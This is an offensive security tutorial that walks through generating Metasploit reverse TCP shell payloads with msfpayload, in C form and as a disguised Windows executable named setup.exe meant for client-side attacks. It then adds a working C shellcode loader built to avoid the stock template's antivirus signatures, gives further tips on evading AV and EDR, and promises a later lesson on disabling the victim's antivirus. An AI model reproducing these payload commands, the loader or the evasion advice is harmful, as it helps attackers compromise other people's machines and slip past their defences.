Step 1: Explore Msfpayload
Let's start by exploring msfpayload, the standalone payload generator that ships with the Metasploit Framework (from Metasploit 4.11 onward it has been replaced by msfvenom, which merges msfpayload and msfencode into one tool, but the concepts below carry over unchanged). Typing msfpayload with the -h switch prints its help screen.
msfpayload -h
Notice in the screenshot above that the syntax takes options, then the payload name, then any VAR=VALUE settings the payload needs, and finally a single letter that selects the output format: C, Perl, Ruby, Raw bytes, JavaScript, a Windows executable (X), a DLL, VBA and others.
These are output formats, not encoders. The shellcode bytes are identical in every format; only the wrapper around them changes, so you pick the one that fits where the payload will be embedded or delivered: a C array to paste into your own source, a Raw stream to pipe into msfencode, a ready-made EXE for a client-side attack, and so on. Choosing a format does nothing to evade the victim's AV software; evasion is the job of msfencode and of the executable template you wrap the shellcode in.
Step 2: Generate a Custom Payload
Let’s proceed to generate a customized payload in C.
msfpayload windows/shell/reverse_tcp O
Notice that we ended the command with the O output selector, which makes Metasploit list the payload's options (S prints the full module summary instead). To generate the customized payload we need to pass the required options on the command line, in this case LHOST and LPORT. For a reverse TCP payload these describe the listener the victim will connect back to, so LHOST is our attacking machine's address, 192.168.100.1, and LPORT is the port our handler will be listening on, 4441.
We need to now generate a custom payload in C by typing:
msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C
Notice that we ended the command with a capital C to indicate that we wanted the payload emitted as C source. As you can see from the screenshot above, Metasploit generated the payload as a C string-literal array named buf[] and displayed it to us, ready to be pasted into a C program of our own.
Step 3: Generate the Binary Code
Finally, we need to generate a binary executable for the shellcode which we can use in our client-side attack.
msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 X > setup.exe
The X option makes msfpayload wrap the shellcode in a Windows executable, which we redirected into the current folder as setup.exe. LPORT must be repeated here: without it the payload would default to port 4444 and never reach our listener on 4441. Before using the file in a client-side attack, two caveats. First, start a matching handler (exploit/multi/handler with the same payload, LHOST and LPORT) so the reverse shell has something to connect back to. Second, do not expect this file to slip past the victim's AV software: the X format builds on the stock Metasploit executable template, which is widely signatured, and the unencoded shellcode is just as well known. Evasion takes the Raw output piped through msfencode, ideally with a custom executable template (-x, with -k to keep the template's original behaviour), and even then the result should be tested against the target's AV product in a lab before relying on it.
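As an added example (not part of the original tutorial and not Metasploit code), here is a small loader that does by hand what the X option does for you: it takes the unsigned char buf[] array that msfpayload printed in C format in Step 2, copies it into memory that is then made executable, and jumps to it. The byte array in the block is a constructed stand-in that merely returns 42 (mov eax, 42 ; ret on x86, the equivalent on AArch64), so the loader can be built and run anywhere without a handler; to run a real payload, paste msfpayload's buf[] in its place. The function names run_shellcode and run_embedded_stub are this example's own.

```c
/* Added example, not from the original tutorial: a minimal loader for the
 * C-format output of msfpayload. The tool prints
 *     unsigned char buf[] = "\xfc\xe8...";
 * and this file shows what to do with that array. STUB below is a
 * constructed stand-in, not a Metasploit payload: it just returns 42 so
 * the loader can be exercised without a handler. Replace it with the real
 * buf[] from `msfpayload ... C` to run a real payload. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* for MAP_ANONYMOUS under strict -std= modes */
#endif
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
/* x86/x86-64: mov eax, 42 ; ret (same encoding in 32- and 64-bit mode) */
static const unsigned char STUB[] = "\xb8\x2a\x00\x00\x00\xc3";
#elif defined(__aarch64__) || defined(_M_ARM64)
/* AArch64: mov w0, #42 ; ret */
static const unsigned char STUB[] = "\x40\x05\x80\x52\xc0\x03\x5f\xd6";
#else
#error "no stand-in stub for this architecture"
#endif

/* Copy `len` bytes of code into a fresh allocation, flip it from RW to RX
 * (never writable and executable at once, which hardened kernels refuse),
 * then call it as a function returning int. Returns that int, or -1 if the
 * memory could not be set up. A real reverse shell blocks inside the call
 * until the session ends. */
int run_shellcode(const unsigned char *code, size_t len)
{
    int (*entry)(void);
    int result;
#ifdef _WIN32
    DWORD old_protect;
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem == NULL)
        return -1;
    memcpy(mem, code, len);
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old_protect)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return -1;
    }
    FlushInstructionCache(GetCurrentProcess(), mem, len);
    memcpy(&entry, &mem, sizeof entry);   /* data-to-function pointer cast */
    result = entry();
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }
    __builtin___clear_cache((char *)mem, (char *)mem + len);
    memcpy(&entry, &mem, sizeof entry);   /* data-to-function pointer cast */
    result = entry();
    munmap(mem, len);
#endif
    return result;
}

/* Run the embedded array. The string-literal form msfpayload uses adds a
 * trailing NUL, so the payload length is sizeof(buf) - 1. */
int run_embedded_stub(void)
{
    return run_shellcode(STUB, sizeof(STUB) - 1);
}

int main(void)
{
    printf("stub returned %d\n", run_embedded_stub());   /* prints 42 */
    return 0;
}
```

Two details matter when you swap in real shellcode. The memory is mapped read/write first and only then flipped to read/execute, because a single RWX mapping is refused by some hardened kernels and is itself a strong AV and EDR heuristic. And the length passed is sizeof(buf) - 1: msfpayload's C output is a string literal, so the compiler appends a NUL that is not part of the payload. Compiling this with the real buf[] gives you an executable that carries none of the stock Metasploit template's signatures, though the shellcode bytes themselves still need encoding to avoid signature matches on the payload.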
And that's it! Stay tuned for my next lesson, where we'll explore ways to disable the client AV software altogether.